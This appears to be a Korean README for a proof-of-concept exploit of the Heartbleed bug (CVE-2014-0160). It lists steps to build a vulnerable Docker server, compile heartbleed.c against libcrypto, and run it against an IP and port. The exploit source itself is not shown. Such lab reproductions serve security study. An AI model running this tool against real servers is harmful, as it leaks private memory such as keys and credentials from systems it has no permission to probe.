
CVE-2014-0160에 설명된 Heartbeat Extension 버그를 악용하기 위한 개념 증명. 🗝️ 🔓
설정을 수행하려면 docker가 필요합니다. 이 익스플로잇은 Client Hello 메시지에서 임의의 바이트를 동적으로 생성하므로, 실행 파일을 빌드할 때 라이브러리를 링크해야 합니다. 올바르게 링크하려면 다음 패키지를 설치해야 합니다:
sudo apt-get install libssl-dev
이 도구는 WSL 2 기반 Docker for Desktop - Version: 20.10.21에서 테스트되었습니다.
취약점을 재현하는 단계는 다음과 같습니다:
cd server-image/
docker build -t <image_name> .
docker run -d -p <port>:443 --name <name> <image_name>
cd ..
gcc -o heartbleed heartbleed.c -lcrypto
./heartbleed <ip> <port>
올바른 포트를 지정해야 합니다.
